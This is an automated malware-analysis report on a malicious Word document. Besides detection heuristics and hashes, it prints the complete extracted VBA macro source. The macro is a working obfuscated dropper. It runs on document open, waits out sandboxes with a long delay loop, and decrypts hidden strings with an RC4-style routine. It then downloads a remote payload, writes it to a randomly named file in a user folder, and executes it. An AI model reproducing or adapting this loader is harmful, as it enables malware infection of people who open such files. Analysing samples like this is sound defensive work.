MALICIOUS
Risk Score: 400
Malware Insights
MITRE ATT&CK
T1566.001 Spearphishing Attachment
T1059.005 Visual Basic
The file is a malicious OOXML document containing obfuscated VBA macros designed to execute upon opening. The document body explicitly instructs the user to 'Enable Editing' and 'Enable Content', a common social engineering tactic. The VBA script uses CreateObject and CallByName, indicative of malicious intent, and the presence of 'macros.bas' and 'vbaProject_00.bin' further confirms macro-based malicious activity.
Heuristics (12)
- ClamAV: Doc.Malware.Chronos-6897935-0 [critical, CLAMAV_DETECTION]: ClamAV detected this file as malware: Doc.Malware.Chronos-6897935-0
- VBA project inside OOXML [medium, OOXML_VBA, 7 related findings]: Document contains a VBA project — VBA macros present
  - Obfuscated auto-exec VBA loader [critical, OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER]: Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
    Matched line in script: GetObject 74, 79
  - CreateObject call [high, OLE_VBA_CREATEOBJ]: CreateObject call
    Matched line in script: Set FbIW4ltLA88 = CreateObject(K3eK9VdclC(MN4z8s1zym("B0120D1D7C751DE2C15160F9EC3352C6F8"), "WZHgB"))
  - GetObject call [high, OLE_VBA_GETOBJ]: GetObject call
    Matched line in script: GetObject 74, 79
  - CallByName call [high, OLE_VBA_CALLBYNAME]: CallByName call
    Matched line in script: CallByName O6L5SL, 66, VbMethod, 6, 86, 69
  - VBA p-code auto-exec with execution tokens [high, OLE_VBA_PCODE_AUTOEXEC_EXEC]: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  - Document_Open macro [low, OLE_VBA_DOCOPEN]: Document_Open macro
    Matched line in script: Sub Document_Open()
  - Environ() call (env variable access) [low, OLE_VBA_ENVIRON]: Environ() call (env variable access)
    Matched line in script: YSpf48ETuJjtz8tpK = Environ(K3eK9VdclC(MN4z8s1zym("C5D7996A28461D"), "Gf1q7py6w")) & "\" & BM69L8KOihljn & K3eK9VdclC(MN4z8s1zym("CCE10A1F"), "Eo7bBqJhcEJ")
- Macro/content-enable lure [medium, SE_ENABLE_LURE]: Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
- Suspicious extracted artifact [info, EXTRACTED_FILE_STATIC_TRIAGE]: One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL [info, EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 15766 bytes |

SHA-256: 3a60f68189c7f222e10f9390520d67a6eb09d5da645157643aad8db98b2e7e21
Detection
ClamAV: No threats found
Obfuscation or payload: likely. 126 of 221 identifiers look randomly generated (e.g. 'B0120D1D7C751DE2C15160F9EC3352C6F8'); 3 string-concatenation chain(s) — consistent with name-mangling obfuscation.
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
#If VBA7 Then
Private Declare PtrSafe Function IUywRdBVQpp Lib "kernel32" Alias "_lclose" (ByVal DcR953340kM As Long) As Long
Private Declare PtrSafe Function YgY6OSQ3xlzlngG Lib "kernel32" Alias "_lwrite" (ByVal Du8L As Long, IPxySewYyq As Any, ByVal NbZIcqZNCUx As Long) As Long
Private Declare PtrSafe Function A0GVv0cPdsI Lib "kernel32" Alias "_lcreat" (ByVal OnIc6SNM46 As String, ByVal Thf5hXYKd As Long) As Long
#Else
Private Declare Function YgY6OSQ3xlzlngG Lib "kernel32" Alias "_lwrite" (ByVal Du8L As Long, IPxySewYyq As Any, ByVal NbZIcqZNCUx As Long) As Long
Private Declare Function IUywRdBVQpp Lib "kernel32" Alias "_lclose" (ByVal DcR953340kM As Long) As Long
Private Declare Function A0GVv0cPdsI Lib "kernel32" Alias "_lcreat" (ByVal OnIc6SNM46 As String, ByVal Thf5hXYKd As Long) As Long
#End If
Function MN4z8s1zym(JDk5DWyHLNwq As String) As String
Dim YQppsPZPr As Long, Pz1wa4B38ttU As Long
YQppsPZPr = 53
Pz1wa4B38ttU = 14
If YQppsPZPr + Pz1wa4B38ttU > 2 Then
Pz1wa4B38ttU = YQppsPZPr + 5
Else
Pz1wa4B38ttU = 6 + 3 + 12
End If
Dim X0N3K As Integer
Dim K1qRiXzPBTlX As Long, Aa2YNuS As Long
K1qRiXzPBTlX = 16
Aa2YNuS = 51
If K1qRiXzPBTlX + Aa2YNuS > 2 Then
Aa2YNuS = K1qRiXzPBTlX + 45
Else
Aa2YNuS = 89 + 31 + 78
End If
For X0N3K = 1 To Len(JDk5DWyHLNwq) Step 2
MN4z8s1zym = MN4z8s1zym & Chr$(Val(Chr$(38) & Chr$(72) & Mid$(JDk5DWyHLNwq, X0N3K, 2)))
Next
Dim YM1ndGwRnFPRWcyDx5g5DtsLK5YYh As Long, JpRFN6TxCu2ZFbmCy As Long
YM1ndGwRnFPRWcyDx5g5DtsLK5YYh = 96
JpRFN6TxCu2ZFbmCy = 9
If YM1ndGwRnFPRWcyDx5g5DtsLK5YYh + JpRFN6TxCu2ZFbmCy > 2 Then
JpRFN6TxCu2ZFbmCy = YM1ndGwRnFPRWcyDx5g5DtsLK5YYh + 46
Else
JpRFN6TxCu2ZFbmCy = 61 + 41 + 2
End If
End Function
Function F5kRJ5Gc4XQuBV(RvmplsFlm As String, SDMnUI97hf5 As String)
Dim IFHIvF304HkSRbUYP As Long, YSsSs4LQ8Imho30mY As Long
IFHIvF304HkSRbUYP = 55
YSsSs4LQ8Imho30mY = 60
If IFHIvF304HkSRbUYP + YSsSs4LQ8Imho30mY > 2 Then
YSsSs4LQ8Imho30mY = IFHIvF304HkSRbUYP + 44
Else
YSsSs4LQ8Imho30mY = 92 + 22 + 8
End If
Dim LfoPS3V2apbgRa As Long
Dim U7pMv As Long, SLG6hrxYFHIvF304H As Long
U7pMv = 63
SLG6hrxYFHIvF304H = 83
If U7pMv + SLG6hrxYFHIvF304H > 2 Then
SLG6hrxYFHIvF304H = U7pMv + 94
Else
SLG6hrxYFHIvF304H = 87 + 10 + 43
End If
LfoPS3V2apbgRa = A0GVv0cPdsI(RvmplsFlm, 128)
Dim DYdC11s As Long, La9huiDkSRbUYP As Long
DYdC11s = 48
La9huiDkSRbUYP = 79
If DYdC11s + La9huiDkSRbUYP > 2 Then
La9huiDkSRbUYP = DYdC11s + 60
Else
La9huiDkSRbUYP = 65 + 49 + 97
End If
YgY6OSQ3xlzlngG LfoPS3V2apbgRa, ByVal SDMnUI97hf5, Len(SDMnUI97hf5)
Dim YmTZRB0sa As Long, Y7DpvaUj7rOCX As Long
YmTZRB0sa = 56
Y7DpvaUj7rOCX = 1
If YmTZRB0sa + Y7DpvaUj7rOCX > 2 Then
Y7DpvaUj7rOCX = YmTZRB0sa + 69
Else
Y7DpvaUj7rOCX = 89 + 2 + 93
End If
IUywRdBVQpp LfoPS3V2apbgRa
Dim IrSNDnvQwKY As Long, Tx74pn0Il As Long
IrSNDnvQwKY = 29
Tx74pn0Il = 38
If IrSNDnvQwKY + Tx74pn0Il > 2 Then
Tx74pn0Il = IrSNDnvQwKY + 10
Else
Tx74pn0Il = 95 + 10 + 68
End If
End Function
Sub Document_Open()
Dim EQXVPtmw9sLw As Long, HY1GXjpXWa6K As Long
EQXVPtmw9sLw = 65
HY1GXjpXWa6K = 74
If EQXVPtmw9sLw + HY1GXjpXWa6K > 2 Then
HY1GXjpXWa6K = EQXVPtmw9sLw + 46
Else
HY1GXjpXWa6K = 59 + 73 + 5
End If
On Error Resume Next
Dim IlaiyzWQbHB As Long, G5Yt As Long
IlaiyzWQbHB = 49
G5Yt = 2
If IlaiyzWQbHB + G5Yt > 2 Then
G5Yt = IlaiyzWQbHB + 18
Else
G5Yt = 42 + 96 + 34
End If
Dim Um2BDRJ5y As Long, FmALjyz As Long, L5U0PnqHI2 As Long
Dim PlGboQ0On As Long, MBKmCGZsOUNiRtk As Long
PlGboQ0On = 24
MBKmCGZsOUNiRtk = 51
If PlGboQ0On + MBKmCGZsOUNiRtk > 2 Then
MBKmCGZsOUNiRtk = PlGboQ0On + 70
Else
MBKmCGZsOUNiRtk = 11 + 37 + 13
End If
Um2BDRJ5y = 917615576: FmALjyz = 0: L5U0PnqHI2 = 0
Dim Aq5FhUvgse9 As Long, Jy7CgAAdJi6 As Long
Aq5FhUvgse9 = 95
Jy7CgAAdJi6 = 63
If Aq5FhUvgse9 + Jy7CgAAdJi6 > 2 Then
Jy7CgAAdJi6 = Aq5FhUvgse9 + 7
Else
Jy7CgAAdJi6 = 75 + 95 + 8
End If
For FmALjyz = 1 To Um2BDRJ5y
L5U0PnqHI2 = L5U0PnqHI2 + 1
Next FmALjyz
Dim DMgyBYN8RGC9C As Long, GkuTI71PHMNFrUcw As Long
DMgyBYN8RGC9C = 70
GkuTI71PHMNFrUcw = 63
If DMgyBYN8RGC9C + GkuTI71PHMNFrUcw > 2 Then
GkuTI71PHMNFrUcw = DMgyBYN8RGC9C + 85
Else
GkuTI71PHMNFrUcw = 91 + 20 + 61
End If
If L5U0PnqHI2 = Um2BDRJ5y Then
Dim OnGjf7SxeNwDs7hAZ As Long, JceOu As Long
OnGjf7SxeNwDs7hAZ = 67
JceOu = 93
If OnGjf7SxeNwDs7hAZ + JceOu > 2 Then
JceOu = OnGjf7SxeNwDs7hAZ + 14
Else
JceOu = 80 + 80 + 55
End If
Dim UZXX As Long, IuOpnDLmEjINyAJi As Long
UZXX = 83
IuOpnDLmEjINyAJi = 24
If UZXX + IuOpnDLmEjINyAJi > 2 Then
IuOpnDLmEjINyAJi = UZXX + 49
Else
IuOpnDLmEjINyAJi = 25 + 98 + 51
End If
BGFU6Kv3BFgLi1VrY
Dim WAE5aA As Long, LUkjtplg9w As Long
WAE5aA = 62
LUkjtplg9w = 14
If WAE5aA + LUkjtplg9w > 2 Then
LUkjtplg9w = WAE5aA + 31
Else
LUkjtplg9w = 55 + 9 + 47
End If
Else
Dim J7xDiVT2X As Long, UTgvw6 As Long
J7xDiVT2X = 24
UTgvw6 = 74
If J7xDiVT2X + UTgvw6 > 2 Then
UTgvw6 = J7xDiVT2X + 25
Else
UTgvw6 = 46 + 35 + 69
End If
Con8
Dim MRydvdQH As Long, EwLUNOJoteCqe0 As Long
MRydvdQH = 16
EwLUNOJoteCqe0 = 72
If MRydvdQH + EwLUNOJoteCqe0 > 2 Then
EwLUNOJoteCqe0 = MRydvdQH + 31
Else
EwLUNOJoteCqe0 = 27 + 92 + 70
End If
End If
Dim DkcBtlVpBKW3A As Long, THxbIFTq1ZRDt As Long
DkcBtlVpBKW3A = 64
THxbIFTq1ZRDt = 29
If DkcBtlVpBKW3A + THxbIFTq1ZRDt > 2 Then
THxbIFTq1ZRDt = DkcBtlVpBKW3A + 34
Else
THxbIFTq1ZRDt = 73 + 28 + 37
End If
End Sub
Function BM69L8KOihljn() As String
Dim JvEVrtQuPNl As Long, BizcTA2V4vZPQV As Long
JvEVrtQuPNl = 60
BizcTA2V4vZPQV = 21
If JvEVrtQuPNl + BizcTA2V4vZPQV > 2 Then
BizcTA2V4vZPQV = JvEVrtQuPNl + 12
Else
BizcTA2V4vZPQV = 13 + 10 + 19
End If
Dim KfXXBk() As Byte, J38ttUVod() As Byte, DQjqbQFq2U As Long, Lp1j9U As Long, K52NBx As String, ILcR9533 As String, JsPZProATafs As Long
Dim IjWCh1 As Long, GydvdQH4 As Long
IjWCh1 = 68
GydvdQH4 = 94
If IjWCh1 + GydvdQH4 > 2 Then
GydvdQH4 = IjWCh1 + 88
Else
GydvdQH4 = 55 + 81 + 30
End If
JsPZProATafs = 0
Dim PZ7x As Long, Qq1ZRDtzTc As Long
PZ7x = 43
Qq1ZRDtzTc = 17
If PZ7x + Qq1ZRDtzTc > 2 Then
Qq1ZRDtzTc = PZ7x + 24
Else
Qq1ZRDtzTc = 74 + 25 + 46
End If
KBV7E0U5tbxV:
Dim W8uGfHQ As Long, Aq1ZRDtzTc As Long
W8uGfHQ = 2
Aq1ZRDtzTc = 17
If W8uGfHQ + Aq1ZRDtzTc > 2 Then
Aq1ZRDtzTc = W8uGfHQ + 96
Else
Aq1ZRDtzTc = 57 + 74 + 75
End If
Randomize
ILcR9533 = Int(30 * Rnd)
If ILcR9533 < 4 Then GoTo KBV7E0U5tbxV
JsPZProATafs = ILcR9533
If JsPZProATafs > 0& Then
Dim OoGf5E1aMU As Long, Thd8gXXNb As Long
OoGf5E1aMU = 40
Thd8gXXNb = 84
If OoGf5E1aMU + Thd8gXXNb > 2 Then
Thd8gXXNb = OoGf5E1aMU + 97
Else
Thd8gXXNb = 12 + 70 + 94
End If
K52NBx = K3eK9VdclC(MN4z8s1zym("047FDD9F6BFD3D4E9E66"), "JCynXdod")
Randomize
KfXXBk = K52NBx
DQjqbQFq2U = Len(K52NBx) - 1&
JsPZProATafs = (JsPZProATafs * 2&) - 1&
ReDim J38ttUVod(JsPZProATafs) As Byte
Dim FNSmkzxPtGTqqw8 As Long, IfoQp260Pca As Long
FNSmkzxPtGTqqw8 = 51
IfoQp260Pca = 52
If FNSmkzxPtGTqqw8 + IfoQp260Pca > 2 Then
IfoQp260Pca = FNSmkzxPtGTqqw8 + 93
Else
IfoQp260Pca = 96 + 15 + 60
End If
For Lp1j9U = 0& To JsPZProATafs Step 2&
J38ttUVod(Lp1j9U) = KfXXBk(CLng(DQjqbQFq2U * Rnd) * 2&)
Next
Dim CJJeEf1lsFV As Long, EncwSv As Long
CJJeEf1lsFV = 10
EncwSv = 48
If CJJeEf1lsFV + EncwSv > 2 Then
EncwSv = CJJeEf1lsFV + 59
Else
EncwSv = 74 + 54 + 15
End If
End If
Dim M2i1qf As Long, JFyZ5a55Gz785eL8 As Long
M2i1qf = 1
JFyZ5a55Gz785eL8 = 77
If M2i1qf + JFyZ5a55Gz785eL8 > 2 Then
JFyZ5a55Gz785eL8 = M2i1qf + 72
Else
JFyZ5a55Gz785eL8 = 61 + 95 + 90
End If
BM69L8KOihljn = J38ttUVod
Dim G1dhCMolRbmTR As Long, WpHh6p4Y As Long
G1dhCMolRbmTR = 63
WpHh6p4Y = 14
If G1dhCMolRbmTR + WpHh6p4Y > 2 Then
WpHh6p4Y = G1dhCMolRbmTR + 36
Else
WpHh6p4Y = 24 + 59 + 27
End If
End Function
Sub Con8()
Dim P6qdoeENRcX4 As Long, Xapj9hmpbUN As Long
P6qdoeENRcX4 = 20
Xapj9hmpbUN = 44
If P6qdoeENRcX4 + Xapj9hmpbUN > 2 Then
Xapj9hmpbUN = P6qdoeENRcX4 + 72
Else
Xapj9hmpbUN = 36 + 69 + 43
End If
Q9bTakfvpA = CurDir
Partition 75, 76, 73, 83
VxSpAwhr6N1 = UCase(54)
Choose 41, JIpOBZoeFVK0je
LOF 54
If CByte(13) = True Then V7rleLg2f4 = 6436
Load KeQKuV9WZRW8uFyS6
ChDir 67
GetObject 74, 79
Month 64
Filter IssB7clw, 10
DateSerial 12, 67, 27
If IsNumeric(96) = True Then GEM9Wg4Evl9TK4x9 = 87
CallByName O6L5SL, 66, VbMethod, 6, 86, 69
Sqr 95
If CBool(16) = True Then LIbFLs0tA3koLwGwD = 82
App.StartLogging "CdulongkW7z", 82
Niydr3Xp = CSng(57)
InputBox 31, 83, 27, 50, 78
IPmt 42, 76, 49, 57
App.LogEvent "LDka64btoNDqZQxba"
Command
LoadPicture 7, 83, 78, 67, 3
Hh9rdznsNL = CVErr(96)
Sin 40
JMqMB5wYOpVvl = QBColor(82)
Weekday 30
FqFdh017GwLnb6 = CVDate(41)
KgH1AUKZpUosr = EOF(34)
Second 56
Dim K451UfWll As Long, Av9I As Long
K451UfWll = 98
Av9I = 57
If K451UfWll + Av9I > 2 Then
Av9I = K451UfWll + 53
Else
Av9I = 19 + 96 + 36
End If
End Sub
Sub AEivMC(Homt9ZkXmKM As Long)
Dim FjMBv As Long, QIY2vgOIYd As Long
FjMBv = 67
QIY2vgOIYd = 77
If FjMBv + QIY2vgOIYd > 2 Then
QIY2vgOIYd = FjMBv + 48
Else
QIY2vgOIYd = 35 + 48 + 7
End If
Dim Rd2PYhJJxdT As Long
Dim EdPHhEV5xsy As Long, RwjxN3hmjB As Long
EdPHhEV5xsy = 42
RwjxN3hmjB = 54
If EdPHhEV5xsy + RwjxN3hmjB > 2 Then
RwjxN3hmjB = EdPHhEV5xsy + 90
Else
RwjxN3hmjB = 7 + 86 + 47
End If
Rd2PYhJJxdT = Timer + Homt9ZkXmKM
Do While Timer < Rd2PYhJJxdT
DoEvents
Loop
Dim URYpgoByQLT As Long, H8K8Kslz As Long
URYpgoByQLT = 17
H8K8Kslz = 28
If URYpgoByQLT + H8K8Kslz > 2 Then
H8K8Kslz = URYpgoByQLT + 43
Else
H8K8Kslz = 23 + 83 + 1
End If
End Sub
Sub BGFU6Kv3BFgLi1VrY()
Dim Bbzgz6T As Long, Cn27dHTPfEnoJ As Long
Bbzgz6T = 56
Cn27dHTPfEnoJ = 62
If Bbzgz6T + Cn27dHTPfEnoJ > 2 Then
Cn27dHTPfEnoJ = Bbzgz6T + 46
Else
Cn27dHTPfEnoJ = 93 + 23 + 9
End If
Dim YSpf48ETuJjtz8tpK As String, FbIW4ltLA88 As Object
Dim MytadhmxqCP As Long, TeoC1TcDsAAR2SA5 As Long
MytadhmxqCP = 59
TeoC1TcDsAAR2SA5 = 73
If MytadhmxqCP + TeoC1TcDsAAR2SA5 > 2 Then
TeoC1TcDsAAR2SA5 = MytadhmxqCP + 32
Else
TeoC1TcDsAAR2SA5 = 83 + 55 + 86
End If
YSpf48ETuJjtz8tpK = Environ(K3eK9VdclC(MN4z8s1zym("C5D7996A28461D"), "Gf1q7py6w")) & "\" & BM69L8KOihljn & K3eK9VdclC(MN4z8s1zym("CCE10A1F"), "Eo7bBqJhcEJ")
Dim QQTL8FLtl5R3eGZcBFxT As Long, StldLIMzXIGDl9MM As Long
QQTL8FLtl5R3eGZcBFxT = 20
StldLIMzXIGDl9MM = 19
If QQTL8FLtl5R3eGZcBFxT + StldLIMzXIGDl9MM > 2 Then
StldLIMzXIGDl9MM = QQTL8FLtl5R3eGZcBFxT + 49
Else
StldLIMzXIGDl9MM = 56 + 62 + 46
End If
Set FbIW4ltLA88 = CreateObject(K3eK9VdclC(MN4z8s1zym("B0120D1D7C751DE2C15160F9EC3352C6F8"), "WZHgB"))
Dim SAVuoQbFJXy As Long, Efmp90W As Long
SAVuoQbFJXy = 77
Efmp90W = 46
If SAVuoQbFJXy + Efmp90W > 2 Then
Efmp90W = SAVuoQbFJXy + 12
Else
Efmp90W = 16 + 56 + 11
End If
FbIW4ltLA88.Open K3eK9VdclC(MN4z8s1zym("9DC0C2"), "LSXeT5xsy"), K3eK9VdclC(MN4z8s1zym("E3E4F263FDADCC6E79896B966A451AA8548BA2FFFBCF4E9C2AA6BB"), "LYOJC"), False
Dim Yda7pVtf As Long, XL7mp90W As Long
Yda7pVtf = 14
XL7mp90W = 10
If Yda7pVtf + XL7mp90W > 2 Then
XL7mp90W = Yda7pVtf + 75
Else
XL7mp90W = 53 + 92 + 74
End If
FbIW4ltLA88.setRequestHeader K3eK9VdclC(MN4z8s1zym("20AC06D51A8B6A7141BB"), "OLF4Q7j"), K3eK9VdclC(MN4z8s1zym("01C440257B9722A6835002"), "OIz7TqTZmWKzN3ks")
FbIW4ltLA88.send
If FbIW4ltLA88.readyState = 4 And FbIW4ltLA88.Status = 200 Then
Dim Qyw3uE8Nv8n6k As Long, SJDO9D8 As Long
Qyw3uE8Nv8n6k = 8
SJDO9D8 = 79
If Qyw3uE8Nv8n6k + SJDO9D8 > 2 Then
SJDO9D8 = Qyw3uE8Nv8n6k + 65
Else
SJDO9D8 = 79 + 38 + 89
End If
F5kRJ5Gc4XQuBV YSpf48ETuJjtz8tpK, K3eK9VdclC(StrConv(FbIW4ltLA88.ResponseBody, vbUnicode), K3eK9VdclC(MN4z8s1zym("79A1A85CEFE775B3E0"), "DRgyDchW3RJ"))
Dim WLjxFwtvIDt As Long, VXErfosaOD As Long
WLjxFwtvIDt = 61
VXErfosaOD = 71
If WLjxFwtvIDt + VXErfosaOD > 2 Then
VXErfosaOD = WLjxFwtvIDt + 16
Else
VXErfosaOD = 29 + 43 + 1
End If
AEivMC 1
Dim YhY2oZ2YaY As Long, CZ5p99AE7JLXg1w As Long
YhY2oZ2YaY = 32
CZ5p99AE7JLXg1w = 9
If YhY2oZ2YaY + CZ5p99AE7JLXg1w > 2 Then
CZ5p99AE7JLXg1w = YhY2oZ2YaY + 4
Else
CZ5p99AE7JLXg1w = 91 + 27 + 22
End If
CreateObject(K3eK9VdclC(MN4z8s1zym("29BB6CC00B1467715544C55158"), "OoShP7L7")).exec """" & YSpf48ETuJjtz8tpK & """"
Dim Luhw51Kj3RhN0K As Long, YnQh3NRYwbT As Long
Luhw51Kj3RhN0K = 70
YnQh3NRYwbT = 19
If Luhw51Kj3RhN0K + YnQh3NRYwbT > 2 Then
YnQh3NRYwbT = Luhw51Kj3RhN0K + 19
Else
YnQh3NRYwbT = 71 + 88 + 12
End If
End If
Dim JyGA4nl5GPs5 As Long, Y1JIMcoj8OMg As Long
JyGA4nl5GPs5 = 56
Y1JIMcoj8OMg = 59
If JyGA4nl5GPs5 + Y1JIMcoj8OMg > 2 Then
Y1JIMcoj8OMg = JyGA4nl5GPs5 + 77
Else
Y1JIMcoj8OMg = 96 + 86 + 43
End If
Set FbIW4ltLA88 = Nothing
Dim DrKgj1FsI08Uvx3 As Long, DlT1UCGq8nDy4 As Long
DrKgj1FsI08Uvx3 = 20
DlT1UCGq8nDy4 = 16
If DrKgj1FsI08Uvx3 + DlT1UCGq8nDy4 > 2 Then
DlT1UCGq8nDy4 = DrKgj1FsI08Uvx3 + 81
Else
DlT1UCGq8nDy4 = 59 + 98 + 80
End If
End Sub
Function K3eK9VdclC(ByVal LNERidI4aVwmD As String, ByVal Gqn1zGLhdvUQylj As String) As String
Dim MQLUIJIrKLfWiOJ As Long, P8dM26aKpC As Long
MQLUIJIrKLfWiOJ = 77
P8dM26aKpC = 69
If MQLUIJIrKLfWiOJ + P8dM26aKpC > 2 Then
P8dM26aKpC = MQLUIJIrKLfWiOJ + 92
Else
P8dM26aKpC = 25 + 53 + 94
End If
On Error Resume Next
Dim Ep6ijVOi As Long, Wl3ZX4Sorv As Long
Ep6ijVOi = 34
Wl3ZX4Sorv = 52
If Ep6ijVOi + Wl3ZX4Sorv > 2 Then
Wl3ZX4Sorv = Ep6ijVOi + 97
Else
Wl3ZX4Sorv = 61 + 18 + 48
End If
Dim SP57yuqlr(0 To 255) As Integer, YsHQs4O6HCpmV As Long, EiJoKrSNKQ2 As Long, Yo2K3r9tZpP1kmD As Long, DU4vahS9e5w2() As Byte, G6WJSPZXveA() As Byte, Jy957Qbg5dkHSE As Byte
Dim EjE3UhzPGfC As Long, ShoTirW9cng8xfv8y As Long
EjE3UhzPGfC = 32
ShoTirW9cng8xfv8y = 31
If EjE3UhzPGfC + ShoTirW9cng8xfv8y > 2 Then
ShoTirW9cng8xfv8y = EjE3UhzPGfC + 62
Else
ShoTirW9cng8xfv8y = 69 + 74 + 58
End If
DU4vahS9e5w2() = StrConv(Gqn1zGLhdvUQylj, vbFromUnicode)
Dim MKTp3VtsDcbX As Long, DAFuSh3flBj4rxMUq As Long
MKTp3VtsDcbX = 43
DAFuSh3flBj4rxMUq = 98
If MKTp3VtsDcbX + DAFuSh3flBj4rxMUq > 2 Then
DAFuSh3flBj4rxMUq = MKTp3VtsDcbX + 58
Else
DAFuSh3flBj4rxMUq = 27 + 19 + 96
End If
For YsHQs4O6HCpmV = 0 To 255
SP57yuqlr(YsHQs4O6HCpmV) = YsHQs4O6HCpmV
Next YsHQs4O6HCpmV
YsHQs4O6HCpmV = 0
EiJoKrSNKQ2 = 0
Yo2K3r9tZpP1kmD = 0
For YsHQs4O6HCpmV = 0 To 255
EiJoKrSNKQ2 = (EiJoKrSNKQ2 + SP57yuqlr(YsHQs4O6HCpmV) + DU4vahS9e5w2(YsHQs4O6HCpmV Mod Len(Gqn1zGLhdvUQylj))) Mod 256
Jy957Qbg5dkHSE = SP57yuqlr(YsHQs4O6HCpmV)
SP57yuqlr(YsHQs4O6HCpmV) = SP57yuqlr(EiJoKrSNKQ2)
SP57yuqlr(EiJoKrSNKQ2) = Jy957Qbg5dkHSE
Next YsHQs4O6HCpmV
YsHQs4O6HCpmV = 0
EiJoKrSNKQ2 = 0
Yo2K3r9tZpP1kmD = 0
G6WJSPZXveA() = StrConv(LNERidI4aVwmD, vbFromUnicode)
For YsHQs4O6HCpmV = 0 To Len(LNERidI4aVwmD)
EiJoKrSNKQ2 = (EiJoKrSNKQ2 + 1) Mod 256
Yo2K3r9tZpP1kmD = (Yo2K3r9tZpP1kmD + SP57yuqlr(EiJoKrSNKQ2)) Mod 256
Jy957Qbg5dkHSE = SP57yuqlr(EiJoKrSNKQ2)
SP57yuqlr(EiJoKrSNKQ2) = SP57yuqlr(Yo2K3r9tZpP1kmD)
SP57yuqlr(Yo2K3r9tZpP1kmD) = Jy957Qbg5dkHSE
G6WJSPZXveA(YsHQs4O6HCpmV) = G6WJSPZXveA(YsHQs4O6HCpmV) Xor (SP57yuqlr((SP57yuqlr(EiJoKrSNKQ2) + SP57yuqlr(Yo2K3r9tZpP1kmD)) Mod 256))
Next YsHQs4O6HCpmV
Dim CH5Y As Long, XBBECQDnmb1 As Long
CH5Y = 75
XBBECQDnmb1 = 2
If CH5Y + XBBECQDnmb1 > 2 Then
XBBECQDnmb1 = CH5Y + 22
Else
XBBECQDnmb1 = 88 + 87 + 63
End If
K3eK9VdclC = StrConv(G6WJSPZXveA, vbUnicode)
Dim DlZJUxwV9QX0J As Long, UIujuRuryh3OK As Long
DlZJUxwV9QX0J = 65
UIujuRuryh3OK = 30
If DlZJUxwV9QX0J + UIujuRuryh3OK > 2 Then
UIujuRuryh3OK = DlZJUxwV9QX0J + 35
Else
UIujuRuryh3OK = 74 + 29 + 38
End If
End Function

| Filename | Kind | Source | Size |
|---|---|---|---|
| vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 38912 bytes |

SHA-256: 44d3d298aa87596720faa51e018d2f02e32ba9c62d49adb65449eddd80c4f5b9
Detection
ClamAV: Doc.Malware.Chronos-6897935-0
Obfuscation or payload: unlikely